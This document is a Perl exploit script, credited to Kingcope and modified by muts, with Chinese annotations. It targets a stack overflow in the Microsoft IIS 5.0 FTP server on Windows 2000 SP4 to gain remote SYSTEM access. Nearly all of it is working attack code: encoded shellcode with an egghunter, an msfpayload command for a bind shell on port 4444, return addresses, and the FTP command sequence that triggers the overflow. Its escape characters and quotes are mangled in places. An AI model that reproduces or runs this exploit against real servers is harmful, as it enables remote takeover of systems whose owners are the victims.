IIS 5.0 FTP Server / Remote SYSTEM exploit

Win2k SP4 targets

bug found & exploited by Kingcope, kcope2googlemail.com

Modded by muts, additional egghunter added for secondary larger payload

Might take a minute or two for the egg to be found.

Opens bind shell on port 4444

http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket; $|=1; $sc = “x89xe2xddxc5xd9x72xf4x5fx57x59x49x49x49x49x43” . “x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34” . “x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41” . “x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58” . “x50x38x41x43x4ax4ax49x45x36x4dx51x48x4ax4bx4f” . “x44x4fx47x32x46x32x42x4ax43x32x46x38x48x4dx46” . “x4ex47x4cx45x55x51x4ax44x34x4ax4fx48x38x46x34” . “x50x30x46x50x50x57x4cx4bx4bx4ax4ex4fx44x35x4a” . “x4ax4ex4fx43x45x4bx57x4bx4fx4dx37x41x41”;

./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b “x00x0ax0d”

$shell=“T00WT00W” .“xdaxdexbdx2dxe7x9bx9fx2bxc9xb1x56xd9x74x24xf4” . “x5ax83xeaxfcx31x6ax15x03x6ax15xcfx12x67x77x86” . “xddx98x88xf8x54x7dxb9x2ax02xf5xe8xfax40x5bx01” . “x71x04x48x92xf7x81x7fx13xbdxf7x4exa4x70x38x1c” . “x66x13xc4x5fxbbxf3xf5xafxcexf2x32xcdx21xa6xeb” . “x99x90x56x9fxdcx28x57x4fx6bx10x2fxeaxacxe5x85” . “xf5xfcx56x92xbexe4xddxfcx1ex14x31x1fx62x5fx3e” . “xebx10x5ex96x22xd8x50xd6xe8xe7x5cxdbxf1x20x5a” . “x04x84x5ax98xb9x9ex98xe2x65x2bx3dx44xedx8bxe5” . “x74x22x4dx6dx7ax8fx1ax29x9fx0excfx41x9bx9bxee” . “x85x2dxdfxd4x01x75xbbx75x13xd3x6ax8ax43xbbxd3” . “x2ex0fx2ex07x48x52x27xe4x66x6dxb7x62xf1x1ex85” . “x2dxa9x88xa5xa6x77x4exc9x9cxcfxc0x34x1fx2fxc8” . “xf2x4bx7fx62xd2xf3x14x72xdbx21xbax22x73x9ax7a” . “x93x33x4ax12xf9xbbxb5x02x02x16xc0x05xccx42x80” . “xe1x2dx75x36xadxb8x93x52x5dxedx0cxcbx9fxcax84” . “x6cxe0x38xb9x25x76x74xd7xf2x79x85xfdx50xd6x2d” . “x96x22x34xeax87x34x11x5axc1x0cxf1x10xbfxdfx60” . “x24xeax88x01xb7x71x49x4cxa4x2dx1ex19x1ax24xca” . “xb7x05x9exe9x4axd3xd9xaax90x20xe7x33x55x1cxc3” . “x23xa3x9dx4fx10x7bxc8x19xcex3dxa2xebxb8x97x19” . “xa2x2cx6ex52x75x2bx6fxbfx03xd3xc1x16x52xebxed” . “xfex52x94x10x9fx9dx4fx91xbfx7fx5axefx57x26x0f” . “x52x3axd9xe5x90x43x5ax0cx68xb0x42x65x6dxfcxc4” . “x95x1fx6dxa1x99x8cx8exe0x90”;

print “IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2 ”; if ($#ARGV ne 1) { print “usage: iiz5.pl ”; exit(0); } srand(time()); $port = int(rand(31337-1022)) + 1025; $locip = $ARGV[1]; $locip =~ s/./,/gi; if (fork()) { $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => ‘21’, Proto => ‘tcp’);

自行修改以下两个地址以增强通用性, 此俩地址在我机器上测试成功

$patch = “x7exd1xf9x7f”; $retaddr = “x9BxB1xF4x77”;

你可以使用wordexp的这两个跳转地址

#$patch = “x90x80xb7x6f”; #$retaddr = “xcdx60xb6x6f”;

这里也修改了, 多加了两个”K”, 因为$myfindsc中

用了”repne scasd[edi]“指令来查找Shellcode, 多

加两个”K”使其四字节对齐, 否则会找不到（通用性？）

$v = “KKKSEXY” . $sc . “V” x (500-length($sc)-5);

溢出时堆栈的基本状况

# |0 |104 | 108 |112 |164 |168 |172 |176 #$c = “A” x 104 . $patch . $patch. “A” x 52 . $patch . “AAAA”. $retaddr .$patch.”Aa4Aa5Aa6Aa7Aa8Aa9Ab”;

#void myfindsc() #{ # __asm # { # int 3; #start: # MOV EDX,ESP; # FCMOVNBE ST,ST(2); # _emit 0xd9; # _emit 0x72; # _emit 0xf4; FSTENV [edx-0Ch] # POP EBP; # PUSH EBP; # POP EBX; # PUSH 76h; # POP EAX; #xorsc: # XOR BYTE PTR DS:[EBX+28h],AL; patch “decode” 的0xff #findsc: # MOV EAX,66666666h; # SUB EAX,66566666h; # PUSH EAX; # POP EDI; # PUSH 21212121h; # POP ECX; # MOV EAX,59584553h; # REPNE SCAS DWORD PTR ES:[EDI]; #decode: # _emit 0x89; # _emit 0xE7; JMP EDI # } #}

#void main() #{ # myfindsc(); #}

修改用于定位Shellcode的代码, 由于该代码需要调

用call或者jmp等指令以跳转到Shellcode的地方, 此

类指令包含了0xff, 会被IIS过滤, 所以这里采用了自

修改的形式将0xff patch掉. 本来想要alpha2加密,

但是加密后内容太长.

$myfindsc = “x8bxd4xdbxd2xd9x72xf4x5dx55x5bx6ax76x58”. “x30x43x27xb8x66x66x66x66x2dx66x66x5Fx66”. “x50x5fx68x21x21x21x21x59xb8x53x45x58x59”. “xf2xafx89xe7”;

$c = $myfindsc . “A” x (104 - length($myfindsc)) . $patch . $patch. “xEBx8Ex44x44”.”A” x 48 . # |<— 第二次跳转: 到这里后最终跳到$myfindsc $patch . “AAAA”. $retaddr . $patch . “A” x 16 .“xE2xAA”.”NN”; # |<— 第一次跳转: 函数返回以后经过跳转来到这里, 但是$myfindsc太远, 就又跳了一次

$x = <$sock>; print $x; print $sock “USER anonimoos ”; $x = <$sock>; print $x; print $sock “PASS $shell ”; $x = <$sock>; print $x; print $sock “USER anonimoos ”; $x = <$sock>; print $x; print $sock “PASS $shell ”; $x = <$sock>; print $x;

print $sock “USER anonymous ”; $x = <$sock>; print $x; print $sock “PASS anonymous ”; $x = <$sock>; print $x; print $sock “MKD w00t$port ”; $x = <$sock>; print $x; print $sock “SITE $v ”; # We store shellcode in memory of process (stack) $x = <$sock>; print $x; print $sock “SITE $v ”; $x = <$sock>; print $x; print $sock “SITE $v ”; $x = <$sock>; print $x; print $sock “SITE $v ”; $x = <$sock>; print $x; print $sock “SITE $v ”; $x = <$sock>; print $x; print $sock “CWD w00t$port ”; $x = <$sock>; print $x; print $sock “MKD CCCC”. “$c ”; # 这里也被修改了, 多加了个C, 用于4字节对齐 $x = <$sock>; print $x; print $sock “PORT $locip,” . int($port / 256) . ”,” . int($port % 256) . ” ”; $x = <$sock>; print $x;

TRIGGER

print $sock “NLST $c*/../C*/ ”; $x = <$sock>; print $x; } else { my $servsock = IO::Socket::INET->new(LocalAddr => “0.0.0.0”, LocalPort => $port, Proto => ‘tcp’, Listen => 1); die “Could not create socket: $! ” unless $servsock; my $new_sock = $servsock->accept(); while(<$new_sock>) { print $_; } close($servsock); } #Cheerio,

#Kingcope

via baicker

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版